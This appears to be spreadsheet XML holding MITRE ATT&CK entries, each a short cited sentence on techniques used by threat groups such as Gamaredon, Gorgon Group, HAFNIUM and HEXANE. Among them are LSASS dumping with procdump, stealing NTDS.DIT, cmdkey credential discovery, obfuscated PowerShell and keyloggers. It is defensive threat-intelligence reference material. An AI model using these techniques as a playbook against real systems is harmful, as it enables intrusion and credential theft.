    <t>relationship--5fc69974-db3b-4475-b37b-07c4731b1a6f</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</si>
  <si>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</si>
  <si>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relationship--e84791af-7bdb-4fe9-8e03-7a10a154c9a4</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used legitimate process names to hide malware including &lt;code&gt;svchosst&lt;/code&gt;.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--1e049e66-14ce-46d5-8af1-d93ea35f4aec</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</si>
  <si>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</si>
  <si>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relationship--5edb6931-3262-40a9-acce-3016ac4153d4</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used `mshta.exe` to execute malicious HTA files.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--f76be4ac-f342-4904-b50d-06e28b878011</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used &lt;code&gt;CreateProcess&lt;/code&gt; to launch additional malicious components.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--9c51f7a2-346b-4ef9-ade0-ac2c5c845c27</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--dd84b767-1623-421b-8f31-048924be5f17</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</si>
  <si>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</si>
  <si>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relationship--f78a5009-59ec-4ae2-89a0-44b8be49a140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</si>
  <si>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</si>
  <si>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relationship--d30d8fa0-7f24-41e5-ae8d-e4449e88d2f0</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used obfuscated PowerShell scripts for staging.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--c14a954c-5d6d-4f29-8542-934e0fa5e9d3</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to enumerate processes on target hosts including Process Explorer.(Citation: Symantec Shuckworm January 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--dfe4c167-8e69-4b15-912f-ccd437674423</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--f2d0fd0d-7bfc-4f3e-bd78-2d691c476046</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--29e9bfd8-e2d3-4e25-8683-6605d99538de</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</si>
  <si>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</si>
  <si>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relationship--d65c9c85-2206-46c0-b55b-4fe2bd022c41</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047)'s malware can take screenshots of the compromised computer every minute.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--3a9117f6-9244-4d09-a69b-43afbb4d2998</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</si>
  <si>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</si>
  <si>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relationship--35624bc2-caf0-4124-88e8-6f60ae52ed9c</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--36112f24-7814-4c75-b5b7-a1205bb28b68</t>
  </si>
  <si>
    <t>A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's username to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--a5ffea60-7694-48cd-92e9-b755669b2fdb</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has injected malicious macros into all Word and Excel documents on mapped network drives.(Citation: ESET Gamaredon June 2020)</t>
  </si>
  <si>
    <t>relationship--9b2ff8c9-3811-4615-a0c7-d79a14b7ade6</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</si>
  <si>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</si>
  <si>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relationship--7cabf1a6-5ad3-4c5d-83e8-161d49e082ac</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered domains to stage payloads.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--4973197d-b2b7-4da2-ad4f-245beca0b389</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--27bf147a-1e8b-481d-8910-3af3e64aa18c</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</si>
  <si>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</si>
  <si>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relationship--3a6022ea-7647-4d61-8103-dd354d8dfd4d</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</si>
  <si>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</si>
  <si>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relationship--c63c7dc5-e374-4bf0-9839-0f940ac6d46c</t>
  </si>
  <si>
    <t xml:space="preserve">[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.(Citation: ESET Gamaredon June 2020)	</t>
  </si>
  <si>
    <t>relationship--fa7887c3-d49d-4499-9ee4-f9a504ce7dec</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</si>
  <si>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</si>
  <si>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relationship--f73df541-6b55-42d1-aec3-53660fda1508</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used WMI to execute scripts used for discovery.(Citation: CERT-EE Gamaredon January 2021)</t>
  </si>
  <si>
    <t>relationship--12e24dfb-3b4c-4244-90c9-2f9675dc6eaa</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can decode contents from a payload that was Base64 encoded and write the contents to a file.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--1b1e5d59-20a4-4915-a553-4db606d8121d</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can attempt to disable security features in Microsoft Office and Windows Defender using the &lt;code&gt;taskkill&lt;/code&gt; command.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--92e8e517-aac5-4d8f-9752-83ee0710f568</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--85a1a7f3-bdcc-4473-ba3c-46d6946d6996</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download additional files from C2 servers.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--5f73d53f-f543-47b6-ab81-9a2764dabaef</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--aee59ac6-e6e6-4b35-b2ce-4e529d4efc4b</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under &lt;code&gt;HKCU\Software\Microsoft\Office\&lt;/code&gt;.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--9f00ebba-7e80-4495-8ba0-081e6a8cc0c8</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can leverage the Windows API call, CreateProcessA(), for execution.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--304c0297-8d9e-41ee-a5c0-f8bd33bdcd2a</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download a remote access tool, [ShiftyBug](https://attack.mitre.org/software/S0294), and inject into another process.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--88078d5c-bbc9-4c34-858f-e18d472d38d4</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--3ed930d6-ab79-4642-8320-2ed59d899b6d</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--07e8c425-2d17-48ea-98ca-40a2aac8cc10</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--313082d2-c493-4053-80c1-06300aeea8e0</t>
  </si>
  <si>
    <t>relationship--a1ec1602-33d6-45be-8eda-2020094e93a4</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--7a2f70b7-7b6e-4c05-8f71-42a494b055ce</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has obtained and used tools such as [QuasarRAT](https://attack.mitre.org/software/S0262) and [Remcos](https://attack.mitre.org/software/S0332).(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--c298538c-bab6-4982-9b83-17f752358932</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) has used macros in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--f623affb-f6e8-4c32-a44f-8835fff92c59</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>relationship--5096cf5d-aedb-49a5-baa7-4cc9538fa1cd</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of remotely deleting files from victims.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--a9bc7666-f637-4093-a5bb-4edb61710e45</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of capturing keystrokes.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--8447c89e-a743-430e-8ef5-41abfcde1a01</t>
  </si>
  <si>
    <t>[Group5](https://attack.mitre.org/groups/G0043) disguised its malicious binaries with several layers of obfuscation, including encrypting the files.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--c3a1969b-1edb-4a78-80ab-b122cc2822e4</t>
  </si>
  <si>
    <t>Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of watching the victim's screen.(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>relationship--8e69c855-db70-4b5e-866b-f9ce0b786156</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has granted privileges to domain accounts.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--d2edfaee-154b-4566-b85c-740e591477d9</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used 7-Zip and WinRAR to compress stolen files for exfiltration.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--0b7dfe49-d8c3-46d8-84ed-bf1898638ac3</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has interacted with Office 365 tenants to gather details regarding target's environments.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--02c3ea88-c33c-47d8-a34a-532ed5498a3d</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected data and files from a compromised machine.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--12cfc154-5240-47ce-ba54-ec40f8a6d13d</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has created domain accounts.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--d814a304-f957-4e7c-9890-30a6d5be39bd</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected e-mail addresses for users they intended to target.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--76bef74f-4820-4838-b56e-b59ae71ac170</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has exfiltrated data to file sharing sites, including MEGA.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--80efda4a-36a7-4b59-9f70-72f4952e2140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</si>
  <si>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</si>
  <si>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relationship--e8e6f472-e048-401c-8a2e-5e2effc09040</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has searched file contents on a compromised host.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--cf249a85-b0e9-4264-899f-164cdfa5a7c8</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--73e8d90b-62e2-4ea2-b66c-2c94297bdcc5</t>
  </si>
  <si>
    <t>25 April 2021</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has hidden files on a compromised host.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--ab6a59bc-fa67-4d6f-ab55-e5cb35f62839</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has obtained IP addresses for publicly-accessible Exchange servers.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--c8a0a286-1296-4f87-bc6e-322cd956fb73</t>
  </si>
  <si>
    <t>09 March 2021</t>
  </si>
  <si>
    <t xml:space="preserve">[HAFNIUM](https://attack.mitre.org/groups/G0125) has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.(Citation: Microsoft HAFNIUM March 2020)(Citation: Rapid7 HAFNIUM Mar 2021) </t>
  </si>
  <si>
    <t>relationship--05ff481d-299f-4b72-9210-f07e7c5bf938</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has checked for network connectivity from a compromised host using `ping`, including attempts to contact `google[.]com`.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--baaa6228-daa9-45e9-884e-42add3851843</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;procdump&lt;/code&gt; to dump the LSASS process memory.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--467d9812-8d19-4fca-a2fd-5a8e1dbb43f7</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.(Citation: FireEye Exchange Zero Days March 2021)</t>
  </si>
  <si>
    <t>relationship--996765a6-6c8a-429d-baa5-32d423fb4207</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has stolen copies of the Active Directory database (NTDS.DIT).(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--d1197689-ff2e-4a0e-ad1e-69bb14c8822d</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used TCP for C2.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--f503c254-b86c-433e-8107-585c53f23b6e</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the Exchange Power Shell module &lt;code&gt;Set-OabVirtualDirectoryPowerShell&lt;/code&gt; to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--a1625ff1-af65-4dbb-b192-3c462fae1acf</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `tasklist` to enumerate processes.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--465d0043-32d0-4ec9-84a6-c0f455f9a33b</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used web shells to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--885c54ee-078a-4cc2-a2a1-c7376767b6b6</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has enumerated domain controllers using `net group "Domain computers"` and `nltest /dclist`.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--de7f9b12-d6e7-4ef6-b55c-77bbca0f8c83</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;rundll32&lt;/code&gt; to load malicious DLLs.(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>relationship--94a67c86-e7f6-4874-b41f-83a3bfc35be3</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used ASCII encoding for C2 traffic.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--f8fe4311-f367-42bb-a51d-688753d0218b</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected IP information via IPInfo.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--be93a442-915b-4923-b7dd-0a20098fe264</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `whoami` to gather user information.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--1ffb7c73-5c51-48a3-85a0-b64111cccdd1</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has operated from leased virtual private servers (VPS) in the United States.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--fedcb717-2453-4c77-8f05-8a28f934725e</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used open-source C2 frameworks, including Covenant.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--dca36cf3-4501-4682-9d3e-df148b46792e</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has acquired web services for use in C2 and exfiltration.(Citation: Microsoft HAFNIUM March 2020)</t>
  </si>
  <si>
    <t>relationship--079eaba3-fdea-4551-b126-6e824136e6f5</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</si>
  <si>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</si>
  <si>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relationship--746c3746-a4e3-4fcb-849c-a1646e48a1bf</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) has used `cmd.exe` to execute commands on the victim's machine.(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--3f7c9ed8-62c0-44fe-9eb1-68b3c226e598</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogging tool to capture the window title.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--e8713274-bcbc-4c18-bf06-2c2a0c01d2ba</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--82c32444-f9a1-4370-b72c-2db8c91e9ac3</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used brute force attacks to compromise valid credentials.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--2cc576f4-9d7d-47e4-a6c5-a6910f8b5b62</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used Base64-encoded scripts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--06219288-2833-4a8e-b8bc-10a834e3af7f</t>
  </si>
  <si>
    <t>14 June 2022</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `cmdkey` on victim machines to identify stored credentials.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--0545e60c-080c-4930-a729-b3ce7dc51979</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a [Mimikatz](https://attack.mitre.org/software/S0002)-based tool and a PowerShell script to steal passwords from Google Chrome.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--9d588be8-f13d-458d-9480-f39ef82197d6</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has set up custom DNS servers to send commands to compromised hosts via TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--f635daec-033b-4d91-afa6-4a6f44f9dddb</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</si>
  <si>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</si>
  <si>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relationship--25e10d85-b8de-45d9-9c3c-b02e53676f9c</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used compromised accounts to send spearphishing emails.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--6eca6ae2-3f86-4b45-86c4-0ac01dfd13dd</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has established email accounts for use in domain registration including for ProtonMail addresses.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--ad5e568c-376c-4ab8-be50-e965feb0c160</t>
  </si>
  <si>
    <t xml:space="preserve">[HEXANE](https://attack.mitre.org/groups/G1001) has targeted executives, human resources staff, and IT personnel for spearphishing.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
</t>
  </si>
  <si>
    <t>relationship--a57d19ce-7a9a-4be5-ae59-a0b331bcc03a</t>
  </si>
  <si>
    <t>06 June 2022</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--3b9f9fae-f68a-419b-9551-5485f8851500</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has identified specific potential victims at targeted organizations.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--1503d568-e350-4021-ac47-a0913f6f4f1d</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has identified executives, HR, and IT staff at victim organizations for further targeting.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--ecce47d4-c937-4feb-8ebf-4e2eb496725d</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has downloaded additional payloads and malicious scripts onto a compromised host.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--bc0c33f3-211b-4b39-ac75-9d8693897b7f</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--f6a8aba6-d711-45bd-a99e-7a12b8c72ae0</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used tools including [BITSAdmin](https://attack.mitre.org/software/S0190) to test internet connectivity from compromised hosts.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--486e3108-33ad-4506-8031-7215acd5ff69</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogger named `kl.ps1`.(Citation: SecureWorks August 2019)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--cecdfe74-68df-4008-8d83-226d0de77782</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `net localgroup` to enumerate local groups.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--5c8e77a8-03f4-4581-a893-a07016bc155f</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</si>
  <si>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</si>
  <si>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relationship--36693ec3-9b3c-4129-af32-b8372c75211c</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used password spraying attacks to obtain valid credentials.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--76ef2eb1-a94c-4dd8-be1e-ccb63d577d9e</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.(Citation: SecureWorks August 2019)(Citation: Kaspersky APT Trends Q1 April 2021)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--9e0a0a20-e78f-491b-b828-934525bf160b</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated processes on targeted systems.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--cca0aac6-bdc2-48da-9b95-c24e41f5a116</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used remote desktop sessions for lateral movement.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--66d2bbd8-1a92-4a5a-80d1-4a11860c64f3</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used `net view` to enumerate domain machines.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--6679b9ed-d9ec-4ff3-9961-24f39814f6d0</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a scheduled task to establish persistence for a keylogger.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--2ed90af5-43e7-4c81-b03d-6d4b54988d75</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--428a1a44-f1bc-4589-94de-946233489905</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated programs installed on an infected machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--d3971408-ef1b-4aae-9477-3319a1b97523</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has collected the hostname of a compromised machine.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--1f238bb1-62c0-409b-ac79-38b38f54497d</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used [Ping](https://attack.mitre.org/software/S0097) and `tracert` for network discovery.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--01f4b583-4bd0-47eb-a108-c0bd7fd4d571</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used [netstat](https://attack.mitre.org/software/S0104) to monitor connections to specific ports.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--c8470c56-2c81-4826-804c-44e53d87333f</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has run `whoami` on compromised machines to identify the current user.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--ba2c0c39-5b92-45d1-827f-5f2b454d3981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</si>
  <si>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</si>
  <si>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relationship--86a7e0a4-4fbd-4355-9428-f0b79249d225</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has staged malware on fraudulent websites set up to impersonate targeted organizations.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--a3e07b45-b35d-4d02-a266-34366a57f557</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--d5d91a04-cdc9-404b-9c8f-7e91a266185d</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) performed padding with null bytes before calculating its hash.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
